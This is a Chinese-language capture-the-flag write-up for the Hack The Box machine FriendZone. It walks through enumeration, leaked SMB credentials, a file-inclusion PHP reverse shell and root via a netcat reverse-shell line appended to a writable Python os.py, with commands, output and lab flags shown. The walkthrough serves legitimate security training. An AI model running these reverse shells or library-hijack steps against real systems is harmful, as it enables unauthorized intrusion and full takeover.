FriendZone-htb-writeup

0x00 靶场技能介绍

章节技能：疯狂枚举、SMB信息泄露、TLS 证书主域名泄露、dig axfr 命令获取其他子域、远程文件包含、SMB可读写目录put上次PHP后门、smb-enum-shares.nse脚本使用、pspy64s监控异常进程、Python os.py 包插入反弹shell

参考链接：https://www.rffuste.com/2020/12/14/htb-friendzone/

参考链接：官方演练记录

0x01 用户权限获取

1、首先获取下靶机的IP地址：10.10.10.123

2、使用nmap进行端口扫描，看看开放了哪些端口信息

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.123 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ nmap -sC -sV -p$ports 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-06 23:49 CST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (1.1s latency).

PORT      STATE  SERVICE        VERSION
21/tcp    open   ftp            vsftpd 2.0.8 or later
22/tcp    open   tcpwrapped
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp    open   domain         ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp    open   http           Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp   open   tcpwrapped
443/tcp   open   ssl/tcpwrapped
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
445/tcp   open   tcpwrapped     Samba smbd 4.7.6-Ubuntu
1266/tcp  closed dellpwrappks
2551/tcp  closed isg-uda-server
9810/tcp  closed unknown
18495/tcp closed unknown
23689/tcp closed unknown
25168/tcp closed unknown
26992/tcp closed unknown
39015/tcp closed unknown
46741/tcp closed unknown
49493/tcp closed unknown
51741/tcp closed unknown
52276/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m56s, deviation: 1h09m08s, median: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-06T15:49:59
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2023-12-06T17:50:00+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.43 seconds

3、查询域名信息

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ dig axfr friendzone.red @10.10.10.123        

; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.         604800  IN      AAAA    ::1
friendzone.red.         604800  IN      NS      localhost.
friendzone.red.         604800  IN      A       127.0.0.1
administrator1.friendzone.red. 604800 IN A      127.0.0.1
hr.friendzone.red.      604800  IN      A       127.0.0.1
uploads.friendzone.red. 604800  IN      A       127.0.0.1
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 292 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Wed Dec 06 23:52:36 CST 2023
;; XFR size: 8 records (messages 1, bytes 289

4、smb目录枚举

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ enum4linux 10.10.10.123                                                  
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Dec  6 23:53:15 2023

[+] Attempting to map shares on 10.10.10.123                                                                         
//10.10.10.123/print$   Mapping: DENIED Listing: N/A Writing: N/A            
//10.10.10.123/Files    Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.123/general  Mapping: OK Listing: OK Writing: N/A
//10.10.10.123/Development      Mapping: OK Listing: OK Writing: N/A

5、获取账号密码

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jan 17 04:10:51 2019
  ..                                  D        0  Tue Sep 13 22:56:24 2022
  creds.txt                           N       57  Wed Oct 10 07:52:42 2018
get
                3545824 blocks of size 1024. 1651384 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> 

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ cat creds.txt 
creds for the admin THING:

admin:WORKWORKHhallelujah@#

6、把前面识别到的子域名纳入到本地hosts中来

┌──(root㉿kali-linux-2022-2)-[/home/kali/Desktop]
└─# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red' >> /etc/hosts

7、登录后台

https://administrator1.friendzone.red/login.php
admin:WORKWORKHhallelujah@#

8、发现本地远程文件包含漏洞

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

9、使用nmap脚本 smb-enum-shares.nse 知晓文件共享目录的绝对路径

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ sudo nmap 10.10.10.123 --script smb-enum-shares.nse

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

10、使用在可读可写的SMB文件里put上我们的木马

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/test]
└─$ smbclient \\\\10.10.10.123\\Development
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php 
putting file php-reverse-shell.php as \php-reverse-shell.php (6.3 kb/s) (average 6.3 kb/s)
smb: \> dir
  .                                   D        0  Thu Dec  7 00:05:14 2023
  ..                                  D        0  Tue Sep 13 22:56:24 2022
  php-reverse-shell.php               A     5493  Thu Dec  7 00:08:14 2023

                3545824 blocks of size 1024. 1651372 blocks available
smb: \> 

12、通过远程文件包含获取初始shell，获取到第一个user.txt

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.123] 55900
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 18:10:22 up 37 min,  0 users,  load average: 0.02, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/$ ls -la /home/
ls -la /home/
total 12
drwxr-xr-x  3 root   root   4096 Sep 13  2022 .
drwxr-xr-x 22 root   root   4096 Sep 13  2022 ..
drwxr-xr-x  5 friend friend 4096 Sep 13  2022 friend
www-data@FriendZone:/$ cat /home/friend/user.txt     
cat /home/friend/user.txt
4e4755aacc0b3a6b2661a5f51bd2a08a
www-data@FriendZone:/$ 

0x02 系统权限获取

13、省略一部分过程，不解释

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

python -m SimpleHTTPServer 8080

www-data@FriendZone:/etc/Development$ wget http://10.10.14.12:8080/pspy64 pspy64

chmod +x pspy64
./pspy64

cat /opt/server_admin/reports.py

/usr/lib/python2.7/os.py

14、通过 LinEnum 发现我们可以对os.py进行修改权限，在这个文件里输入一个反弹shell 来获取最终的root权限

www-data@FriendZone:/$ echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 10010 >/tmp/f')" >> /usr/lib/python2.7/os.py
<0.14.7 10010 >/tmp/f')" >> /usr/lib/python2.7/os.py
www-data@FriendZone:/$

15、获取到最终的root权限

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10010
listening on [any] 10010 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.123] 48600
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/root
# ls
certs
root.txt
# cat root.txt
39745fd268a059fb44a08c6a54edb2bb
# 

16、不过问，为啥这篇文章这么简略，因为枚举到吐都不知道咋弄，信息检索能力太差，就这？还容易级别？？？我OSCP还考不考吧 == ，要是都是这个题，我估计我可以放弃了。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/173